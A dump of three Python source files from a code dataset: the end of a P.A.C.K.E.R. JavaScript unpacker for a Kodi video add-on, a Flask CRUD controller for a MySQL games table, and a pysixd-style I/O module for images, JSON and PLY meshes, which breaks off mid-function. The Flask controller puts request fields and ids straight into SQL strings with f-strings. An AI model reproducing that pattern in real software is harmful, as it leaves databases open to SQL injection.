p.a.c.k.e.r\"\"\"\n\nimport re\n\nfrom resources.lib.util import Unquote\n\n\nclass cPacker():\n def detect(self, source):\n \"\"\"Detects whether `source` is P.A.C.K.E.R. coded.\"\"\"\n return source.replace(' ', '').startswith('eval(function(p,a,c,k,e,')\n\n def unpack(self, source):\n \"\"\"Unpacks P.A.C.K.E.R. packed js code.\"\"\"\n payload, symtab, radix, count = self._filterargs(source)\n\n # correction pour eviter bypass\n if (len(symtab) > count) and (count > 0):\n del symtab[count:]\n if (len(symtab) < count) and (count > 0):\n symtab.append('BUGGED')\n\n if count != len(symtab):\n raise UnpackingError('Malformed p.a.c.k.e.r. symtab.')\n\n try:\n unbase = Unbaser(radix)\n except TypeError:\n raise UnpackingError('Unknown p.a.c.k.e.r. encoding.')\n\n def lookup(match):\n \"\"\"Look up symbols in the synthetic symtab.\"\"\"\n word = match.group(0)\n return symtab[unbase(word)] or word\n\n source = re.sub(r'\\b\\w+\\b', lookup, payload)\n return self._replacestrings(source)\n\n def _cleanstr(self, str):\n str = str.strip()\n if str.find(\"function\") == 0:\n pattern = (r\"=\\\"([^\\\"]+).*}\\s*\\((\\d+)\\)\")\n args = re.search(pattern, str, re.DOTALL)\n if args:\n a = args.groups()\n def openload_re(match):\n c = match.group(0)\n b = ord(c) + int(a[1])\n return chr(b if (90 if c <= \"Z\" else 122) >= b else b - 26)\n\n str = re.sub(r\"[a-zA-Z]\", openload_re, a[0])\n str = Unquote(str)\n\n elif str.find(\"decodeURIComponent\") == 0:\n str = re.sub(r\"(^decodeURIComponent\\s*\\(\\s*('|\\\"))|(('|\\\")\\s*\\)$)\", \"\", str)\n str = Unquote(str)\n elif str.find(\"\\\"\") == 0:\n str = re.sub(r\"(^\\\")|(\\\"$)|(\\\".*?\\\")\", \"\", str)\n elif str.find(\"'\") == 0:\n str = re.sub(r\"(^')|('$)|('.*?')\", \"\", str)\n\n return str\n\n def _filterargs(self, source):\n \"\"\"Juice from a source file the four args needed by decoder.\"\"\"\n\n source = source.replace(',[],',',0,').replace(\"\\\\'\", \"'\")\n\n juicer = (r\"}\\s*\\(\\s*(.*?)\\s*,\\s*(\\d+)\\s*,\\s*(\\d+)\\s*,\\s*\\((.*?)\\).split\\((.*?)\\)\")\n args = re.search(juicer, source, re.DOTALL)\n if args:\n a = args.groups()\n try:\n return self._cleanstr(a[0]), self._cleanstr(a[3]).split(self._cleanstr(a[4])), int(a[1]), int(a[2])\n except ValueError:\n raise UnpackingError('Corrupted p.a.c.k.e.r. data.')\n\n juicer = (r\"}\\('(.*)', *(\\d+), *(\\d+), *'(.*)'\\.split\\('(.*?)'\\)\")\n# juicer = (r\"}\\(\\\\'(.*)', *(\\d+), *(\\d+), *\\\\'(.*)'\\.split\\(\\\\'(.*?)\\\\'\\)\")\n args = re.search(juicer, source, re.DOTALL)\n if args:\n a = args.groups()\n try:\n return a[0], a[3].split(a[4]), int(a[1]), int(a[2])\n except ValueError:\n raise UnpackingError('Corrupted p.a.c.k.e.r. data.')\n\n # could not find a satisfying regex\n raise UnpackingError('Could not make sense of p.a.c.k.e.r data (unexpected code structure)')\n\n def _replacestrings(self, source):\n \"\"\"Strip string lookup table (list) and replace values in source.\"\"\"\n match = re.search(r'var *(_\\w+)\\=\\[\"(.*?)\"\\];', source, re.DOTALL)\n\n if match:\n varname, strings = match.groups()\n startpoint = len(match.group(0))\n lookup = strings.split('\",\"')\n variable = '%s[%%d]' % varname\n for index, value in enumerate(lookup):\n source = source.replace(variable % index, '\"%s\"' % value)\n return source[startpoint:]\n return source\n\n\ndef UnpackingError(Exception):\n # Badly packed source or general error.#\n print(Exception)\n pass\n\n\nclass Unbaser(object):\n \"\"\"Functor for a given base. Will efficiently convert\n strings to natural numbers.\"\"\"\n ALPHABET = {\n 62: '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ',\n 95: (' !\"#$%&\\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n '[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~')\n }\n\n def __init__(self, base):\n self.base = base\n\n # Error not possible, use 36 by defaut\n if base == 0:\n base = 36\n\n # If base can be handled by int() builtin, let it do it for us\n if 2 <= base <= 36:\n self.unbase = lambda string: int(string, base)\n else:\n if base < 62:\n self.ALPHABET[base] = self.ALPHABET[62][0:base]\n elif 62 < base < 95:\n self.ALPHABET[base] = self.ALPHABET[95][0:base]\n # Build conversion dictionary cache\n try:\n self.dictionary = dict((cipher, index) for index, cipher in enumerate(self.ALPHABET[base]))\n except KeyError:\n raise TypeError('Unsupported base encoding.')\n\n self.unbase = self._dictunbaser\n\n def __call__(self, string):\n return self.unbase(string)\n\n def _dictunbaser(self, string):\n \"\"\"Decodes a value to an integer.\"\"\"\n ret = 0\n\n for index, cipher in enumerate(string[::-1]):\n ret += (self.base ** index) * self.dictionary[cipher]\n return ret\n","repo_name":"Kodi-vStream/venom-xbmc-addons","sub_path":"plugin.video.vstream/resources/lib/packer.py","file_name":"packer.py","file_ext":"py","file_size_in_byte":5854,"program_lang":"python","lang":"en","doc_type":"code","stars":456,"dataset":"github-code","pt":"37"} +{"seq_id":"8723138201","text":"from flask import Flask, jsonify, request\r\nfrom flask_restx import Api\r\nfrom bd.bd_connect import cursor, conexao\r\nfrom src.server.instance import Server\r\nimport mysql.connector\r\n\r\napp, api = Server.app, Server.api\r\n\r\n@app.route('/game', methods=['GET'])\r\ndef get_game():\r\n cursor.execute(\"SELECT * FROM games\")\r\n game = cursor.fetchall()\r\n return jsonify(game)\r\n\r\n# consulta por id\r\n@app.route(\"/game/\", methods=[\"GET\"])\r\ndef get_game_id(id):\r\n cursor.execute(f\"SELECT * FROM games WHERE (id = {id})\")\r\n game = cursor.fetchall()\r\n return jsonify(game)\r\n\r\n# criar\r\n@app.route(\"/game\", methods=[\"POST\"])\r\ndef insert_game():\r\n new_game = request.get_json()\r\n name = new_game['name']\r\n launched = new_game['launched']\r\n description = new_game['description']\r\n cursor.execute(f\"INSERT INTO games (name, launched, description) VALUES ('{name}', '{launched}', '{description}')\")\r\n conexao.commit()\r\n return jsonify(new_game)\r\n\r\n\r\n# editar por id\r\n@app.route(\"/game/\", methods=[\"PUT\"])\r\ndef edit_game_on_id(id):\r\n updated = request.get_json()\r\n name = updated['name']\r\n launched = updated['launched']\r\n description = updated['description']\r\n cursor.execute(f\"UPDATE games SET name = '{name}', launched = '{launched}', description = '{description}' WHERE id = {id}\")\r\n conexao.commit()\r\n return jsonify(updated)\r\n\r\n# excluir \r\n@app.route(\"/game/\", methods=[\"DELETE\"])\r\ndef excluir_livro(id):\r\n cursor.execute(f\"DELETE FROM games WHERE id = {id}\")\r\n return jsonify('200 OK')\r\n\r\ncursor.close()\r\nconexao.close()","repo_name":"kuromadoshii/projeto-cadastro","sub_path":"Game/back-game/src/controllers/game_controller.py","file_name":"game_controller.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12209294874","text":"# from pysixd toolkit\n# Author: Tomas Hodan (hodantom@cmp.felk.cvut.cz)\n# Center for Machine Perception, Czech Technical University in Prague\n# modified\n\"\"\"I/O functions.\"\"\"\nimport json\nimport os\nimport os.path as osp\nimport struct\nimport sys\n\nimport imageio\nimport mmcv\nimport numpy as np\nimport png\nimport scipy.io as sio\nimport scipy.misc\nimport six\n\n# import ruamel.yaml as yaml\nimport yaml\n\ncur_dir = osp.dirname(osp.abspath(__file__))\nsys.path.append(osp.join(cur_dir, \"../..\"))\nfrom lib.utils import logger\nfrom lib.utils.is_binary_file import is_binary as _is_binary\n\n\ndef load_im(path):\n \"\"\"Loads an image from a file.\n\n :param path: Path to the image file to load.\n :return: ndarray with the loaded image.\n \"\"\"\n im = imageio.imread(path)\n return im\n\n\ndef save_im(path, im, jpg_quality=95):\n \"\"\"Saves an image to a file.\n\n :param path: Path to the output image file.\n :param im: ndarray with the image to save.\n :param jpg_quality: Quality of the saved image (applies only to JPEG).\n \"\"\"\n ext = os.path.splitext(path)[1][1:]\n if ext.lower() in [\"jpg\", \"jpeg\"]:\n imageio.imwrite(path, im, quality=jpg_quality)\n else:\n imageio.imwrite(path, im)\n\n\ndef load_depth(path):\n # NOTE: cv2 is more faster (about 2x)\n \"\"\"Loads a depth image from a file.\n\n :param path: Path to the depth image file to load.\n :return: ndarray with the loaded depth image.\n \"\"\"\n d = imageio.imread(path)\n return d.astype(np.float32)\n\n\ndef save_depth(path, im):\n \"\"\"Saves a depth image (16-bit) to a PNG file.\n\n :param path: Path to the output depth image file.\n :param im: ndarray with the depth image to save.\n \"\"\"\n if path.split(\".\")[-1].lower() != \"png\":\n raise ValueError(\"Only PNG format is currently supported.\")\n\n im_uint16 = np.round(im).astype(np.uint16)\n\n # PyPNG library can save 16-bit PNG and is faster than imageio.imwrite().\n # cv2 is far more faster\n w_depth = png.Writer(im.shape[1], im.shape[0], greyscale=True, bitdepth=16)\n with open(path, \"wb\") as f:\n w_depth.write(f, np.reshape(im_uint16, (-1, im.shape[1])))\n\n\ndef load_json(path, keys_to_int=False):\n \"\"\"Loads content of a JSON file.\n\n :param path: Path to the JSON file.\n :return: Content of the loaded JSON file.\n \"\"\"\n # Keys to integers.\n def convert_keys_to_int(x):\n return {int(k) if k.lstrip(\"-\").isdigit() else k: v for k, v in x.items()}\n\n with open(path, \"r\") as f:\n if keys_to_int:\n content = json.load(f, object_hook=lambda x: convert_keys_to_int(x))\n else:\n content = json.load(f)\n\n return content\n\n\ndef save_json(path, content, sort=False):\n \"\"\"Saves the provided content to a JSON file.\n\n :param path: Path to the output JSON file.\n :param content: Dictionary/list to save.\n \"\"\"\n with open(path, \"w\") as f:\n\n if isinstance(content, dict):\n f.write(\"{\\n\")\n if sort:\n content_sorted = sorted(content.items(), key=lambda x: x[0])\n else:\n content_sorted = content.items()\n for elem_id, (k, v) in enumerate(content_sorted):\n f.write(' \"{}\": {}'.format(k, json.dumps(v, sort_keys=True)))\n if elem_id != len(content) - 1:\n f.write(\",\")\n f.write(\"\\n\")\n f.write(\"}\")\n\n elif isinstance(content, list):\n f.write(\"[\\n\")\n for elem_id, elem in enumerate(content):\n f.write(\" {}\".format(json.dumps(elem, sort_keys=True)))\n if elem_id != len(content) - 1:\n f.write(\",\")\n f.write(\"\\n\")\n f.write(\"]\")\n\n else:\n json.dump(content, f, sort_keys=True)\n\n\n# Set representation of the floating point numbers in YAML files\ndef float_representer(dumper, value):\n text = \"{0:.8f}\".format(value)\n return dumper.represent_scalar(u\"tag:yaml.org,2002:float\", text)\n\n\nyaml.add_representer(float, float_representer)\n\n\n# ===================================\n# LINEMOD_ORIG\ndef read_linemod_transform_dat(transform_dat_path):\n # for LINEMOD ORIG\n transform_dat = np.loadtxt(transform_dat_path, skiprows=1)[:, 1]\n transform_dat = np.reshape(transform_dat, newshape=[3, 4])\n return transform_dat\n\n\ndef load_linemod_orig_model(model_dir):\n # for LINEMOD_ORIG/cls/\n orig_model_path = osp.join(model_dir, \"mesh.ply\")\n orig_old_model_path = osp.join(model_dir, \"OLDmesh.ply\")\n transform_dat_path = osp.join(model_dir, \"transform.dat\")\n if os.path.exists(orig_model_path):\n return ply_vtx(orig_model_path) / 1000.0\n else:\n transform = read_linemod_transform_dat(transform_dat_path)\n old_model = ply_vtx(orig_old_model_path) / 1000.0\n old_model = np.dot(old_model, transform[:, :3].T) + transform[:, 3]\n return old_model\n\n\ndef read_linemod_pose(rot_path, tra_path):\n \"\"\"read linemod orig pose.\"\"\"\n rot = np.loadtxt(rot_path, skiprows=1)\n tra = np.loadtxt(tra_path, skiprows=1) / 100.0\n return np.concatenate([rot, np.reshape(tra, newshape=[3, 1])], axis=-1)\n\n\n# ======================================\ndef pose_from_meta_LM6d(meta_file, cls_idx):\n \"\"\"assume single instance of cls_idx.\"\"\"\n meta_data = sio.loadmat(meta_file)\n inner_id = np.where(np.squeeze(meta_data[\"cls_indexes\"]) == cls_idx)\n if len(meta_data[\"poses\"].shape) == 2:\n pose = meta_data[\"poses\"]\n else:\n pose = np.squeeze(meta_data[\"poses\"][:, :, inner_id])\n return pose\n\n\ndef load_emb_pkl_single(emb_path, cls_idx=None, width=640, height=480):\n assert osp.exists(emb_path), \"not exist {}\".format(emb_path)\n emb = None\n tmp = mmcv.load(emb_path)\n if isinstance(tmp, dict):\n emb = np.zeros((height, width, 3), dtype=np.float32)\n x1, y1, x2, y2 = tmp[\"bbox\"]\n emb[y1 : y2 + 1, x1 : x2 + 1, :] = tmp[\"emb\"]\n elif isinstance(tmp, list) and cls_idx is not None:\n \"\"\"assume single instance of cls_idx.\"\"\"\n for e in tmp:\n if e is not None and e[\"cls_idx\"] == cls_idx:\n emb = np.zeros((height, width, 3), dtype=np.float32)\n x1, y1, x2, y2 = e[\"bbox\"]\n emb[y1 : y2 + 1, x1 : x2 + 1, :] = e[\"emb\"]\n return emb\n\n\ndef load_cam_params(path):\n \"\"\"Loads camera parameters from a JSON file.\n\n :param path: Path to the JSON file.\n :return: Dictionary with the following items:\n - 'im_size': (width, height).\n - 'K': 3x3 intrinsic camera matrix.\n - 'depth_scale': Scale factor to convert the depth images to mm (optional).\n \"\"\"\n c = load_json(path)\n\n cam = {\n \"im_size\": (c[\"width\"], c[\"height\"]),\n \"K\": np.array([[c[\"fx\"], 0.0, c[\"cx\"]], [0.0, c[\"fy\"], c[\"cy\"]], [0.0, 0.0, 1.0]]),\n }\n\n if \"depth_scale\" in c.keys():\n cam[\"depth_scale\"] = float(c[\"depth_scale\"])\n\n return cam\n\n\ndef load_scene_camera(path):\n \"\"\"Loads content of a JSON file with information about the scene camera.\n\n See docs/bop_datasets_format.md for details.\n\n :param path: Path to the JSON file.\n :return: Dictionary with the loaded content.\n \"\"\"\n scene_camera = load_json(path, keys_to_int=True)\n\n for im_id in scene_camera.keys():\n if \"cam_K\" in scene_camera[im_id].keys():\n scene_camera[im_id][\"cam_K\"] = np.array(scene_camera[im_id][\"cam_K\"], np.float).reshape((3, 3))\n if \"cam_R_w2c\" in scene_camera[im_id].keys():\n scene_camera[im_id][\"cam_R_w2c\"] = np.array(scene_camera[im_id][\"cam_R_w2c\"], np.float).reshape((3, 3))\n if \"cam_t_w2c\" in scene_camera[im_id].keys():\n scene_camera[im_id][\"cam_t_w2c\"] = np.array(scene_camera[im_id][\"cam_t_w2c\"], np.float).reshape((3, 1))\n return scene_camera\n\n\ndef save_scene_camera(path, scene_camera):\n \"\"\"Saves information about the scene camera to a JSON file.\n\n See docs/bop_datasets_format.md for details.\n\n :param path: Path to the output JSON file.\n :param scene_camera: Dictionary to save to the JSON file.\n \"\"\"\n for im_id in sorted(scene_camera.keys()):\n im_camera = scene_camera[im_id]\n if \"cam_K\" in im_camera.keys():\n im_camera[\"cam_K\"] = im_camera[\"cam_K\"].flatten().tolist()\n if \"cam_R_w2c\" in im_camera.keys():\n im_camera[\"cam_R_w2c\"] = im_camera[\"cam_R_w2c\"].flatten().tolist()\n if \"cam_t_w2c\" in im_camera.keys():\n im_camera[\"cam_t_w2c\"] = im_camera[\"cam_t_w2c\"].flatten().tolist()\n save_json(path, scene_camera)\n\n\ndef load_scene_gt(path):\n \"\"\"Loads content of a JSON file with ground-truth annotations.\n\n See docs/bop_datasets_format.md for details.\n\n :param path: Path to the JSON file.\n :return: Dictionary with the loaded content.\n \"\"\"\n scene_gt = load_json(path, keys_to_int=True)\n\n for im_id, im_gt in scene_gt.items():\n for gt in im_gt:\n if \"cam_R_m2c\" in gt.keys():\n gt[\"cam_R_m2c\"] = np.array(gt[\"cam_R_m2c\"], np.float).reshape((3, 3))\n if \"cam_t_m2c\" in gt.keys():\n gt[\"cam_t_m2c\"] = np.array(gt[\"cam_t_m2c\"], np.float).reshape((3, 1))\n return scene_gt\n\n\ndef save_scene_gt(path, scene_gt):\n \"\"\"Saves ground-truth annotations to a JSON file.\n\n See docs/bop_datasets_format.md for details.\n\n :param path: Path to the output JSON file.\n :param scene_gt: Dictionary to save to the JSON file.\n \"\"\"\n for im_id in sorted(scene_gt.keys()):\n im_gts = scene_gt[im_id]\n for gt in im_gts:\n if \"cam_R_m2c\" in gt.keys():\n gt[\"cam_R_m2c\"] = gt[\"cam_R_m2c\"].flatten().tolist()\n if \"cam_t_m2c\" in gt.keys():\n gt[\"cam_t_m2c\"] = gt[\"cam_t_m2c\"].flatten().tolist()\n if \"obj_bb\" in gt.keys():\n gt[\"obj_bb\"] = [int(x) for x in gt[\"obj_bb\"]]\n save_json(path, scene_gt)\n\n\ndef load_bop_results(path, version=\"bop19\"):\n \"\"\"Loads 6D object pose estimates from a file.\n\n :param path: Path to a file with pose estimates.\n :param version: Version of the results.\n :return: List of loaded poses.\n \"\"\"\n results = []\n\n # See docs/bop_challenge_2019.md for details.\n if version == \"bop19\":\n header = \"scene_id,im_id,obj_id,score,R,t,time\"\n with open(path, \"r\") as f:\n line_id = 0\n for line in f:\n line_id += 1\n if line_id == 1 and header in line:\n continue\n else:\n elems = line.split(\",\")\n if len(elems) != 7:\n raise ValueError(\"A line does not have 7 comma-sep. elements: {}\".format(line))\n # import pdb; pdb.set_trace();\n result = {\n \"scene_id\": int(elems[0]),\n \"im_id\": int(elems[1]),\n \"obj_id\": int(elems[2]),\n \"score\": float(elems[3]),\n \"R\": np.array(list(map(float, elems[4].split())), np.float).reshape((3, 3)),\n \"t\": np.array(list(map(float, elems[5].split())), np.float).reshape((3, 1)),\n \"time\": float(elems[6]),\n }\n\n results.append(result)\n else:\n raise ValueError(\"Unknown version of BOP results.\")\n\n return results\n\n\ndef save_bop_results(path, results, version=\"bop19\"):\n \"\"\"Saves 6D object pose estimates to a file.\n\n :param path: Path to the output file.\n :param results: Dictionary with pose estimates.\n :param version: Version of the results.\n \"\"\"\n # See docs/bop_challenge_2019.md for details.\n if version == \"bop19\":\n lines = [\"scene_id,im_id,obj_id,score,R,t,time\"]\n for res in results:\n if \"time\" in res:\n run_time = res[\"time\"]\n else:\n run_time = -1\n\n lines.append(\n \"{scene_id},{im_id},{obj_id},{score},{R},{t},{time}\".format(\n scene_id=res[\"scene_id\"],\n im_id=res[\"im_id\"],\n obj_id=res[\"obj_id\"],\n score=res[\"score\"],\n R=\" \".join(map(str, res[\"R\"].flatten().tolist())),\n t=\" \".join(map(str, res[\"t\"].flatten().tolist())),\n time=run_time,\n )\n )\n\n with open(path, \"w\") as f:\n f.write(\"\\n\".join(lines))\n\n else:\n raise ValueError(\"Unknown version of BOP results.\")\n\n\ndef check_bop_results(path, version=\"bop19\"):\n \"\"\"Checks if the format of BOP results is correct.\n\n :param result_filenames: Path to a file with pose estimates.\n :param version: Version of the results.\n :return: True if the format is correct, False if it is not correct.\n \"\"\"\n check_passed = True\n check_msg = \"OK\"\n try:\n results = load_bop_results(path, version)\n\n if version == \"bop19\":\n # Check if the time for all estimates from the same image are the same.\n times = {}\n for result in results:\n result_key = \"{:06d}_{:06d}\".format(result[\"scene_id\"], result[\"im_id\"])\n if result_key in times:\n if abs(times[result_key] - result[\"time\"]) > 0.001:\n check_passed = False\n check_msg = (\n \"The running time for scene {} and image {} is not the same for\"\n \" all estimates.\".format(result[\"scene_id\"], result[\"im_id\"])\n )\n logger.info(check_msg)\n break\n else:\n times[result_key] = result[\"time\"]\n\n except Exception as e:\n check_passed = False\n check_msg = \"Error when loading BOP results: {}\".format(e)\n logger.info(check_msg)\n\n return check_passed, check_msg\n\n\ndef ply_vtx(path, vertex_scale=1.0):\n \"\"\"\n discription: read all vertices from a ply file\n (borrow from https://github.com/paroj/linemod_dataset/blob/master/read.py)\n\n : param path: path to ply model file\n return: all 3D points of ply model: (N, 3)\n \"\"\"\n with open(path) as f:\n assert f.readline().strip() == \"ply\"\n for line in f:\n line = line.strip()\n if \"element vertex\" in line:\n N_str = line.split()[-1]\n # print(N_str)\n N = int(N_str)\n break\n while f.readline().strip() != \"end_header\":\n continue\n pts = []\n for _ in range(N):\n pts.append(np.float32(f.readline().split()[:3]))\n return np.array(pts) * vertex_scale\n\n\ndef ply_vtx_expand(path, vertex_scale=1.0):\n \"\"\"\n discription: read all vertices from a ply file and expand vertices using polygon info.\n (borrow from https://github.com/paroj/linemod_dataset/blob/master/read.py)\n\n : param path: path to ply model file\n return: all 3D points of ply model: (N, 3)\n \"\"\"\n f = open(path)\n assert f.readline().strip() == \"ply\"\n while True:\n line = f.readline().strip()\n if line.startswith(\"element vertex\"):\n N = int(line.split()[-1])\n if line.startswith(\"element face\"):\n F = int(line.split()[-1])\n if line == \"end_header\":\n break\n pts = []\n for _ in range(N):\n pts.append(np.float32(f.readline().split()[:3]))\n ptsExpand = []\n for _ in range(F):\n line = f.readline()\n num, *ptsIdx = line.strip().split()\n for i in range(int(num)):\n for j in range(int(num)):\n if i < j:\n pts_i = pts[int(ptsIdx[i])]\n pts_j = pts[int(ptsIdx[j])]\n pts_bais = 1 / 3.0 * (pts_j - pts_i)\n ptsExpand.append(pts_i + pts_bais)\n ptsExpand.append(pts_i + 2 * pts_bais)\n f.close()\n return np.array(pts + ptsExpand) * vertex_scale\n\n\n# def load_ply_model(model_path):\n# from plyfile import PlyData\n# ply = PlyData.read(model_path)\n# data = ply.elements[0].data\n# x = data['x']\n# y = data['y']\n# z = data['z']\n# return np.stack([x, y, z], axis=-1)\n\n\ndef load_ply_model(model_path, vertex_scale=1.0):\n model = load_ply(model_path)\n return model[\"pts\"] * vertex_scale\n\n\ndef load_ply(path, vertex_scale=1.0):\n # https://github.com/thodan/sixd_toolkit/blob/master/pysixd/inout.py\n # bop_toolkit\n \"\"\"Loads a 3D mesh model from a PLY file.\n\n :param path: Path to a PLY file.\n :return: The loaded model given by a dictionary with items:\n -' pts' (nx3 ndarray),\n - 'normals' (nx3 ndarray), optional\n - 'colors' (nx3 ndarray), optional\n - 'faces' (mx3 ndarray), optional.\n - 'texture_uv' (nx2 ndarray), optional\n - 'texture_uv_face' (mx6 ndarray), optional\n - 'texture_file' (string), optional\n \"\"\"\n if _is_binary(path):\n f = open(path, \"rb\")\n else:\n f = open(path, \"r\")\n\n # Only triangular faces are supported.\n face_n_corners = 3\n\n n_pts = 0\n n_faces = 0\n pt_props = []\n face_props = []\n is_binary = False\n header_vertex_section = False\n header_face_section = False\n texture_file = None\n\n # Read the header.\n while True:\n\n # Strip the newline character(s)\n line = f.readline()\n if isinstance(line, str):\n line = line.rstrip(\"\\n\").rstrip(\"\\r\")\n else:\n line = str(line, \"utf-8\").rstrip(\"\\n\").rstrip(\"\\r\")\n\n if line.startswith(\"comment TextureFile\"):\n texture_file = line.split()[-1]\n elif line.startswith(\"element vertex\"):\n n_pts = int(line.split()[-1])\n header_vertex_section = True\n header_face_section = False\n elif line.startswith(\"element face\"):\n n_faces = int(line.split()[-1])\n header_vertex_section = False\n header_face_section = True\n elif line.startswith(\"element\"): # Some other element.\n header_vertex_section = False\n header_face_section = False\n elif line.startswith(\"property\") and header_vertex_section:\n # (name of the property, data type)\n prop_name = line.split()[-1]\n if prop_name == \"s\":\n prop_name = \"texture_u\"\n if prop_name == \"t\":\n prop_name = \"texture_v\"\n prop_type = line.split()[-2]\n pt_props.append((prop_name, prop_type))\n elif line.startswith(\"property list\") and header_face_section:\n elems = line.split()\n if elems[-1] == \"vertex_indices\" or elems[-1] == \"vertex_index\":\n # (name of the property, data type)\n face_props.append((\"n_corners\", elems[2]))\n for i in range(face_n_corners):\n face_props.append((\"ind_\" + str(i), elems[3]))\n elif elems[-1] == \"texcoord\":\n # (name of the property, data type)\n face_props.append((\"texcoord\", elems[2]))\n for i in range(face_n_corners * 2):\n face_props.append((\"texcoord_ind_\" + str(i), elems[3]))\n else:\n logger.warning(\"Warning: Not supported face property: \" + elems[-1])\n elif line.startswith(\"format\"):\n if \"binary\" in line:\n is_binary = True\n elif line.startswith(\"end_header\"):\n break\n\n # Prepare data structures.\n model = {}\n if texture_file is not None:\n model[\"texture_file\"] = texture_file\n model[\"pts\"] = np.zeros((n_pts, 3), np.float)\n if n_faces > 0:\n model[\"faces\"] = np.zeros((n_faces, face_n_corners), np.float)\n\n # print(pt_props)\n pt_props_names = [p[0] for p in pt_props]\n face_props_names = [p[0] for p in face_props]\n # print(pt_props_names)\n\n is_normal = False\n if {\"nx\", \"ny\", \"nz\"}.issubset(set(pt_props_names)):\n is_normal = True\n model[\"normals\"] = np.zeros((n_pts, 3), np.float)\n\n is_color = False\n if {\"red\", \"green\", \"blue\"}.issubset(set(pt_props_names)):\n is_color = True\n model[\"colors\"] = np.zeros((n_pts, 3), np.float)\n\n is_texture_pt = False\n if {\"texture_u\", \"texture_v\"}.issubset(set(pt_props_names)):\n is_texture_pt = True\n model[\"texture_uv\"] = np.zeros((n_pts, 2), np.float)\n\n is_texture_face = False\n if {\"texcoord\"}.issubset(set(face_props_names)):\n is_texture_face = True\n model[\"texture_uv_face\"] = np.zeros((n_faces, 6), np.float)\n\n # Formats for the binary case.\n formats = {\"float\": (\"f\", 4), \"double\": (\"d\", 8), \"int\": (\"i\", 4), \"uchar\": (\"B\", 1)}\n\n # Load vertices.\n for pt_id in range(n_pts):\n prop_vals = {}\n load_props = [\"x\", \"y\", \"z\", \"nx\", \"ny\", \"nz\", \"red\", \"green\", \"blue\", \"texture_u\", \"texture_v\"]\n if is_binary:\n for prop in pt_props:\n format = formats[prop[1]]\n read_data = f.read(format[1])\n val = struct.unpack(format[0], read_data)[0]\n if prop[0] in load_props:\n prop_vals[prop[0]] = val\n else:\n elems = f.readline().rstrip(\"\\n\").rstrip(\"\\r\").split()\n for prop_id, prop in enumerate(pt_props):\n if prop[0] in load_props:\n prop_vals[prop[0]] = elems[prop_id]\n\n model[\"pts\"][pt_id, 0] = float(prop_vals[\"x\"])\n model[\"pts\"][pt_id, 1] = float(prop_vals[\"y\"])\n model[\"pts\"][pt_id, 2] = float(prop_vals[\"z\"])\n\n if is_normal:\n model[\"normals\"][pt_id, 0] = float(prop_vals[\"nx\"])\n model[\"normals\"][pt_id, 1] = float(prop_vals[\"ny\"])\n model[\"normals\"][pt_id, 2] = float(prop_vals[\"nz\"])\n\n if is_color:\n model[\"colors\"][pt_id, 0] = float(prop_vals[\"red\"])\n model[\"colors\"][pt_id, 1] = float(prop_vals[\"green\"])\n model[\"colors\"][pt_id, 2] = float(prop_vals[\"blue\"])\n\n if is_texture_pt:\n model[\"texture_uv\"][pt_id, 0] = float(prop_vals[\"texture_u\"])\n model[\"texture_uv\"][pt_id, 1] = float(prop_vals[\"texture_v\"])\n\n # Load faces.\n for face_id in range(n_faces):\n prop_vals = {}\n if is_binary:\n for prop in face_props:\n format = formats[prop[1]]\n val = struct.unpack(format[0], f.read(format[1]))[0]\n if prop[0] == \"n_corners\":\n if val != face_n_corners:\n raise ValueError(\"Only triangular faces are supported.\")\n # print(\"Number of face corners: \" + str(val))\n # exit(-1)\n elif prop[0] == \"texcoord\":\n if val != face_n_corners * 2:\n raise ValueError(\"Wrong number of UV face coordinates.\")\n else:\n prop_vals[prop[0]] = val\n else:\n elems = f.readline().rstrip(\"\\n\").rstrip(\"\\r\").split()\n for prop_id, prop in enumerate(face_props):\n if prop[0] == \"n_corners\":\n if int(elems[prop_id]) != face_n_corners:\n raise ValueError(\"Only triangular faces are supported.\")\n elif prop[0] == \"texcoord\":\n if int(elems[prop_id]) != face_n_corners * 2:\n raise ValueError(\"Wrong number of UV face coordinates.\")\n else:\n prop_vals[prop[0]] = elems[prop_id]\n\n model[\"faces\"][face_id, 0] = int(prop_vals[\"ind_0\"])\n model[\"faces\"][face_id, 1] = int(prop_vals[\"ind_1\"])\n model[\"faces\"][face_id, 2] = int(prop_vals[\"ind_2\"])\n\n if is_texture_face:\n for i in range(6):\n model[\"texture_uv_face\"][face_id, i] = float(prop_vals[\"texcoord_ind_{}\".format(i)])\n\n f.close()\n model[\"pts\"] *= vertex_scale\n\n return model\n\n\ndef save_ply(path, model, extra_header_comments=None):\n \"\"\"Saves a 3D mesh model to a PLY file.\n\n :param path: Path to a PLY file.\n :param model: 3D model given by a dictionary with items:\n - 'pts' (nx3 ndarray)\n - 'normals' (nx3 ndarray, optional)\n - 'colors' (nx3 ndarray, optional)\n - 'faces' (mx3 ndarray, optional)\n - 'texture_uv' (nx2 ndarray, optional)\n - 'texture_uv_face' (mx6 ndarray, optional)\n - 'texture_file' (string, optional)\n :param extra_header_comments: Extra header comment (optional).\n \"\"\"\n pts = model[\"pts\"]\n pts_colors = model[\"colors\"] if \"colors\" in model.keys() else None\n pts_normals = model[\"normals\"] if \"normals\" in model.keys() else None\n faces = model[\"faces\"] if \"faces\" in model.keys() else None\n texture_uv = model[\"texture_uv\"] if \"texture_uv\" in model.keys() else None\n texture_uv_face = model[\"texture_uv_face\"] if \"texture_uv_face\" in model.keys() else None\n texture_file = model[\"texture_file\"] if \"texture_file\" in model.keys() else None\n\n save_ply2(\n path, pts, pts_colors, pts_normals, faces, texture_uv, texture_uv_face, texture_file, extra_header_comments\n )\n\n\ndef save_ply2(\n path,\n pts,\n pts_colors=None,\n pts_normals=None,\n faces=None,\n texture_uv=None,\n texture_uv_face=None,\n texture_file=None,\n extra_header_comments=None,\n):\n \"\"\"Saves a 3D mesh model to a PLY file.\n\n :param path: Path to the resulting PLY file.\n :param pts: nx3 ndarray with vertices.\n :param pts_colors: nx3 ndarray with vertex colors (optional).\n :param pts_normals: nx3 ndarray with vertex normals (optional).\n :param faces: mx3 ndarray with mesh faces (optional).\n :param texture_uv: nx2 ndarray with per-vertex UV texture coordinates\n (optional).\n :param texture_uv_face: mx6 ndarray with per-face UV texture coordinates\n (optional).\n :param texture_file: Path to a texture image -- relative to the resulting\n PLY file (optional).\n :param extra_header_comments: 